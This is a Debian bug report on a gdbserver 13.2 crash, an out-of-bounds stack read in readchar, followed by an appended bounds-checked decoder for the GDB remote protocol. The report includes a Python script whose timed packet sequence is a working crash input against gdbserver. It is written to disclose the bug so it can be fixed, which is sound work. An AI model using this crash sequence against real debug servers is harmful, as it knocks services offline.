Package: gdbserver
Version: 13.2-1
Severity: important
X-Debbugs-Cc: research.mnt...@gmail.com
Dear Maintainer,

During a debug session with IDAPro 7.7 in conjunction with gdbserver, I encountered a crash while IDA was trying to reconnect to the remote debugger. I reproduced exactly all the “GDB serial Protocol” commands that I sent to gdbserver using a python script and the only error I got was SIGPIPE. I noticed that adding a sleep between the commands resulted in the same crash mentioned above. After a little bit of trial and error I found that the combination of commands resulting in SEGFAULT was:

“+” -> (sleep one second after the response) -> “QStartNoAckMode” -> (sleep one second after the response) --> "%" (sleep one second) --> SEGFAULT

I was running gdbserver in my local network using "gdbserver localhost:23946 ~/Desktop/whar"; the version of gdbserver is GNU gdbserver (Debian 13.2-1) 13.2 and gdbserver was configured as "x86_64-linux-gnu". Usually if the commands are not sent with the right timing the only error raised is SIGPIPE and the program keeps running.

I found out that there is an out-of-bounds read during the call of readchar (gdbserver/remote-utils.cc:847). The variable readchar_bufcnt is decremented, leading to a backward out-of-bounds stack read causing a SEGMENTATION FAULT. I have no clue why the program bypasses the checks and starts to read the stack.
This is the python script I used to crash the program:

    import socket
    import time


    def checksum(s: str) -> str:
        # GDB Remote Serial Protocol checksum: sum of payload bytes modulo 256,
        # sent as two lowercase hex digits (zero-padded, hence "02x").
        res = sum(map(ord, s)) % 256
        return f'{res:02x}'


    def ack(sock):
        # A bare '+' acknowledges the previous packet; it is not framed.
        sock.send(b'+')


    def send(sock, s: str) -> str:
        # Frame the payload as "$<data>#<checksum>" and wait for the reply,
        # except for '+', which is sent as a raw acknowledgement.
        if s != '+':
            sock.send(f'${s}#{checksum(s)}'.encode())
            res = sock.recv(1024)
        else:
            ack(sock)
            res = '_'
        return res


    def main():
        ip = '192.168.1.13'
        port = '23946'
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.connect((ip, int(port)))
            res = send(sock, "QStartNoAckMode")
            print(res)
            time.sleep(1)
            res = send(sock, "qXfer:threads:read::0,47fe")
            print(res)
            time.sleep(1)
            res = send(sock, "%")
            print(res)
            time.sleep(1)


    if __name__ == '__main__':
        main()

-- System Information:
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2023.3
Codename: kali-rolling
Architecture: x86_64

Kernel: Linux 5.10.0-kali3-amd64 (SMP w/2 CPU threads)
Kernel taint flags: TAINT_UNSIGNED_MODULE
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gdbserver depends on:
ii  libc6       2.37-6
ii  libgcc-s1   13.1.0-6
ii  libstdc++6  13.1.0-6

gdbserver recommends no packages.

gdbserver suggests no packages.

-- no debconf information
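The report above concerns the framing of GDB Remote Serial Protocol input ("+" acknowledgements, "$...#xx" packets and "%...#xx" notifications). As an added illustration that is not part of the bug report or of gdbserver's own code, the decoder below shows what a bounds-checked reader of that framing looks like: it consumes only complete frames, leaves a truncated trailer for the next read instead of reading past the buffer, and verifies the checksum. All input bytes are constructed for the example.

```python
from dataclasses import dataclass
from typing import List, Tuple


def rsp_checksum(payload: bytes) -> int:
    """Modulo-256 sum of the payload bytes, as the RSP '#xx' trailer carries."""
    return sum(payload) % 256


def encode_packet(payload: bytes, notification: bool = False) -> bytes:
    """Frame a payload as '$...#xx' (or '%...#xx' for a notification)."""
    lead = b'%' if notification else b'$'
    return lead + payload + b'#' + f'{rsp_checksum(payload):02x}'.encode()


@dataclass
class Frame:
    kind: str              # 'ack', 'nak', 'packet' or 'notification'
    payload: bytes = b''


def decode_stream(buf: bytes) -> Tuple[List[Frame], bytes]:
    """Decode every complete frame in buf and return (frames, leftover).

    Every index is checked against len(buf) before it is dereferenced, so a
    frame whose '#xx' trailer has not arrived yet is returned as leftover
    rather than read past the end of the buffer."""
    frames: List[Frame] = []
    i = 0
    while i < len(buf):
        c = buf[i:i + 1]
        if c == b'+':
            frames.append(Frame('ack')); i += 1; continue
        if c == b'-':
            frames.append(Frame('nak')); i += 1; continue
        if c not in (b'$', b'%'):
            raise ValueError(f'unexpected byte {c!r} at offset {i}')
        end = buf.find(b'#', i + 1)
        if end == -1 or end + 3 > len(buf):
            break                      # incomplete frame: wait for more input
        payload = buf[i + 1:end]
        try:
            want = int(buf[end + 1:end + 3], 16)
        except ValueError:
            raise ValueError('checksum is not two hex digits')
        if rsp_checksum(payload) != want:
            raise ValueError('checksum mismatch')
        frames.append(Frame('notification' if c == b'%' else 'packet', payload))
        i = end + 3                    # skip past '#xx'
    return frames, buf[i:]
```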